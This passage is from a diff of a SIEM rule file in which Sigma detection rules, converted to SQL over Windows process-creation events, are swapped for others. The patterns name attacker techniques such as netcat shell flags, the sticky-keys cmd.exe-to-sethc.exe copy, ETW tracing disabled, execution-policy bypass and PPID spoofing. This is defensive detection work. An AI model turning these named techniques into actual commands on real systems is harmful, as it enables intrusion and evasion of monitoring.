OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" + "filename": "proc_creation_win_powershell_public_folder.yml" }, { - "title": "PUA - Netcat Suspicious Execution", - "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", + "title": "DLL Sideloading by Microsoft Defender", + "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", "status": "experimental", - "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control", - "attack.t1095" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate ncat use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_netcat.yml" + "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" }, { - "title": "New User Created Via Net.EXE With Never Expire Option", - "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", + "id": "52ff7941-8211-46f9-84f8-9903efb7077d", "status": "test", - "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1134.004" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_user_add_never_expire.yml" + "filename": "proc_creation_win_hktl_selectmyparent.yml" }, { - "title": "Suspicious Execution of InstallUtil To Download", - "id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", - "status": "experimental", - "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Renamed SysInternals DebugView Execution", + "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "status": "test", + "description": "Detects suspicious renamed SysInternals DebugView execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR OriginalFileName = 'InstallUtil.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_installutil_download.yml" + "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" }, { - "title": "Suspicious Diantz Alternate Data Stream Execution", - "id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", + "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", + "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "status": "test", - "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", - "author": "frack113", + "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", + "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1216" ], "falsepositives": [ - "Very Possible" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_diantz_ads.yml" + "filename": "proc_creation_win_lolbin_manage_bde.yml" }, { - "title": "Suspicious Key Manager Access", - "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", + "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", "status": "experimental", - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_keymgr.yml" + "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" }, { - "title": "Remote Code Execute via Winrm.vbs", - "id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", - "status": "test", - "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", - "author": "Julia Fomina, oscd.community", + "title": "Wscript Shell Run In CommandLine", + "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "status": "experimental", + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Rare legitimate inline scripting by some administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR OriginalFileName = 'cscript.exe') AND (CommandLine LIKE '%winrm%' ESCAPE '\\' AND CommandLine LIKE '%invoke Create wmicimv2/Win32\\_%' ESCAPE '\\' AND CommandLine LIKE '%-r:http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" + "filename": "proc_creation_win_script_wscript_shell_cli.yml" }, { - "title": "Potential Binary Impersonating Sysinternals Tools", - "id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "title": "Pubprn.vbs Proxy Execution", + "id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", "status": "experimental", - "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1216.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AccessEnum.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADInsight.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADInsight64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adrestore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adrestore64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autologon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autologon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autoruns.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autoruns64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\autorunsc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\autorunsc64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bginfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bginfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Cacheset.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Cacheset64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Clockres.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Clockres64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Contig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Contig64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Coreinfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Coreinfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CPUSTRES.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CPUSTRES64.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ctrl2cap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dbgview64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktops.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktops64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\disk2vhd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\disk2vhd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskext64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Diskmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Diskmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DiskView.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DiskView64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\du.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\du64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\efsdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FindLinks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FindLinks64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hex2dec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hex2dec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\junction.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\junction64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldmdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\listdlls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\listdlls64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrdC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrdC64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonsessions.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonsessions64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\movefile.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\movefile64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfault64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfaultc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfaultc64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntfsinfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntfsinfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pendmoves.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pendmoves64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pipelist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pipelist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\portmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Procmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Procmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psfile.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psfile64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psGetsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psGetsid64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psInfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psInfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pskill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pskill64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pslist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pslist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psping64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psshutdown.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psshutdown64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RAMMap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RegDelNull.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RegDelNull64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regjump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ru.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ru64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ShareEnum.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ShareEnum64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\shellRunas.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sigcheck.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sigcheck64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\streams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\streams64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\strings.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\strings64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sync.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sync64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpvcon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpvcon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpview64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Testlimit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Testlimit64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vmmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vmmap64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Volumeid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Volumeid64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whois.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whois64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Winobj.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Winobj64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ZoomIt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ZoomIt64.exe' ESCAPE '\\') AND NOT ((Company IN ('Sysinternals - www.sysinternals.com', 'Sysinternals')) OR (Company = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\pubprn.vbs%' ESCAPE '\\' AND CommandLine LIKE '%script:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_tools_masquerading.yml" + "filename": "proc_creation_win_lolbin_pubprn.yml" }, { - "title": "Persistence Via Sticky Key Backdoor", - "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "title": "Potential Process Injection Via Msra.EXE", + "id": "744a188b-0415-4792-896f-11ddb0588dbc", "status": "experimental", - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "author": "Sreeman", + "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", + "author": "Alexander McDonald", "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Legitimate use of Msra.exe" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\route.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" + "filename": "proc_creation_win_msra_process_injection.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", - "id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", - "status": "test", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "title": "Suspicious Extexport Execution", + "id": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "status": "experimental", + "description": "Extexport.exe loads dll and is execute from other folder the original path", "author": "frack113", "tags": [ "attack.defense_evasion", @@ -13609,3213 +13446,3285 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (CommandLine LIKE '%-ModuleName %' ESCAPE '\\' OR CommandLine LIKE '%-ModulePath %' ESCAPE '\\' OR CommandLine LIKE '%-ScriptBlock %' ESCAPE '\\' OR CommandLine LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Extexport.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extexport.exe' ESCAPE '\\' OR OriginalFileName = 'extexport.exe'))" ], - "filename": "proc_creation_win_powershell_ath_remote_fxv_gpu_disablement_command.yml" + "filename": "proc_creation_win_lolbin_extexport.yml" }, { - "title": "Disable of ETW Trace", - "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", - "status": "test", - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "Rundll32 InstallScreenSaver Execution", + "id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", + "status": "experimental", + "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.t1218.011", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate installation of a new screensaver" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 